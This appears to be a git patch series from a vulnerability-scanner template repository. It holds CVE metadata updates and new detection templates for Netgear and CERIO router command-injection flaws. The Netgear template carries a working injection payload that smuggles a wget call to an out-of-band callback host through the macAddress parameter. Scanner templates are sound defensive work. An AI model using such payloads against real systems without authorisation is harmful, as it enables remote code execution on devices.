http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac +http/cves/2024/CVE-2024-0195.yaml:eb8732fdcf909e648fe0b0b7b5034baef8fba762 http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe @@ -4684,7 +4685,7 @@ http/exposures/configs/jsconfig-json.yaml:2b4eef2963c707feef05c1953816da94d1a331 http/exposures/configs/karma-config-js.yaml:0ef25cc1986c133be7cba2144ecd6cc287c3c4b9 http/exposures/configs/keycloak-openid-config.yaml:42ffdd485eb9de21b1cfdc3c631e384151ad5281 http/exposures/configs/kubernetes-kustomization-disclosure.yaml:eb652b556472ef31b9d25b651c66780796ef87fa -http/exposures/configs/kyan-credential-exposure.yaml:8fa3cc4b02e0d50fd78a3a033d8fd799d17af82e +http/exposures/configs/kyan-credential-exposure.yaml:89fe2c0d0d0d8af080c76f692d54c0bee6eb0442 http/exposures/configs/laravel-env.yaml:f3071adfe9141a9fdf4b7ddf913a1b05118ab9d0 http/exposures/configs/lvmeng-uts-disclosure.yaml:cc8d43b2cd08dc0ba883f385679681598ec373b2 http/exposures/configs/magento-config-disclosure.yaml:c7ed206ff84ae43bb9bbae4ddbc8e5354558076a @@ -7925,7 +7926,7 @@ http/vulnerabilities/other/talroo-jobs-xss.yaml:34af231d34704c63a01bbeba21bc7174 http/vulnerabilities/other/tamronos-rce.yaml:0f057fdf03116f53c69573789145ff009573a639 http/vulnerabilities/other/tamronos-user-creation.yaml:2c73bb0f38c1ef165578c00832d316ed40faeefe http/vulnerabilities/other/tekon-info-leak.yaml:78521259191534295b7ea481980c2adee69a17ab -http/vulnerabilities/other/tendat-credential.yaml:718813e1e5a830afbff9241402d3813dfbd64f28 +http/vulnerabilities/other/tendat-credential.yaml:a856f441a8d54650c5c7c8b80ef721111bb500ef http/vulnerabilities/other/thinkific-redirect.yaml:251ca37bf18bf81069db0b137edd2afa0d0e4f58 http/vulnerabilities/other/thruk-xss.yaml:b6bd8aac6da2278ad8142ee74120625d3309fe4f http/vulnerabilities/other/tianqing-info-leak.yaml:bfe5a313b8c2fad5722b13e933fe3b65bc0eb89e @@ -8557,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f3f365d17a887e4be9b351392082b92297401162 +templates-checksum.txt:04b59522b13a9ae897489138806ed87daab73c4c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c4ceebffea5959cda3568c679eaccb2a8ca08a21 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:53:46 +0000 Subject: [PATCH 181/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3b5dbac81c..9c8c56ad1a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2023/CVE-2023-6065.yaml' + - 'http/cves/2024/CVE-2024-0195.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' From af7b08d0e017dfa44ef827e9a92fbb1f16b641e1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:54:44 +0000 Subject: [PATCH 182/847] Auto Generated cves.json [Thu May 23 12:54:43 UTC 2024] :robot: --- cves.json | 8 +++++++- cves.json-checksum.txt | 2 +- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index 160b9d0298..b5bbba72c0 100644 --- a/cves.json +++ b/cves.json @@ -1639,7 +1639,7 @@ {"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-22242.yaml"} {"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22536.yaml"} {"ID":"CVE-2022-22733","Info":{"Name":"Apache ShardingSphere ElasticJob-UI privilege escalation","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-22733.yaml"} -{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop Ap Pagebuilder \u003c= 2.4.4 SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"} +{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop AP Pagebuilder \u003c= 2.4.4 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"} {"ID":"CVE-2022-2290","Info":{"Name":"Trilium \u003c0.52.4 - Cross-Site Scripting","Severity":"medium","Description":"Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2290.yaml"} {"ID":"CVE-2022-22947","Info":{"Name":"Spring Cloud Gateway Code Injection","Severity":"critical","Description":"Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22947.yaml"} {"ID":"CVE-2022-22954","Info":{"Name":"VMware Workspace ONE Access - Server-Side Template Injection","Severity":"critical","Description":"VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22954.yaml"} @@ -2181,6 +2181,7 @@ {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} {"ID":"CVE-2023-35885","Info":{"Name":"Cloudpanel 2 \u003c 2.3.1 - Remote Code Execution","Severity":"critical","Description":"CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35885.yaml"} {"ID":"CVE-2023-36144","Info":{"Name":"Intelbras Switch - Information Disclosure","Severity":"high","Description":"An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36144.yaml"} +{"ID":"CVE-2023-36284","Info":{"Name":"QloApps 1.6.0 - SQL Injection","Severity":"high","Description":"An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36284.yaml"} {"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"} {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"} @@ -2274,6 +2275,7 @@ {"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"} {"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"} {"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} +{"ID":"CVE-2023-4542","Info":{"Name":"D-Link DAR-8000-10 - Command Injection","Severity":"critical","Description":"D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4542.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} {"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"} {"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"} @@ -2322,6 +2324,7 @@ {"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"} {"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"} {"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} +{"ID":"CVE-2023-6065","Info":{"Name":"Quttera Web Malware Scanner \u003c= 3.4.1.48 - Sensitive Data Exposure","Severity":"medium","Description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-6065.yaml"} {"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"} {"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} {"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"} @@ -2338,6 +2341,7 @@ {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} +{"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"} {"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"} @@ -2398,11 +2402,13 @@ {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} +{"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 341b934c1f..a8bbfdcf41 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -6cee9d81045ba3fb25589784532a78e4 +2ecfbdb4298145f0427a7bc3f0ccd192 From 6e9f8f031ee7747918cd2592a8eab4100026608c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:55:10 +0000 Subject: [PATCH 183/847] Auto Template Signing [Thu May 23 12:55:10 UTC 2024] :robot: --- http/cves/2024/CVE-2024-0195.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index c458ad3cd3..0d421f8fc1 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -54,3 +54,4 @@ http: part: interactsh_protocol words: - "dns" +# digest: 4a0a004730450220745e8b365ef39550953f2e7c7ec479c97d618b53aca81aa2b4ca13122a21393e022100ca3f258bebf53fbde78835764d0418a8e96537a8c81731da03b8ef7429d65e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9ac9c195d7202f840cc8ad216c0be88301fb17dd Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:27:16 +0530 Subject: [PATCH 184/847] Create netgear-boarddataww-rce.yaml --- http/iot/netgear-boarddataww-rce.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/iot/netgear-boarddataww-rce.yaml diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml new file mode 100644 index 0000000000..c83be5cafd --- /dev/null +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -0,0 +1,39 @@ +id: netgear-boarddataww-rce + +info: + name: Netgear router boardDataWW.php - Remote Code Execution + author: pussycat0x + severity: high + description: | + There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash. + reference: + - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: title=="Netgear" + tags: rce,netgear,iot + +http: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "<title>Netgear" + + - type: status + status: + - 200 From 8f52a499a85f55e5a03933b95d673a35142ac6f2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:28:41 +0530 Subject: [PATCH 185/847] Create cerio-dt-rce.yaml --- http/vulnerabilities/other/cerio-dt-rce.yaml | 38 ++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/other/cerio-dt-rce.yaml diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml new file mode 100644 index 0000000000..985d765643 --- /dev/null +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -0,0 +1,38 @@ +id: cerio-dt-rce + +info: + name: CERIO-DT Save.cgi interface - Command Execution + author: pussycat0x + severity: critical + description: | + CERIO DT series routers have an operation command injection vulnerability in specific versions. An attacker could exploit this vulnerability to execute commands. + reference: + - https://github.com/20142995/sectool + - https://github.com/tanjiti/sec_profile + - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md + metadata: + fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N" + tags: cerio,rce + +http: + - raw: + - | + POST 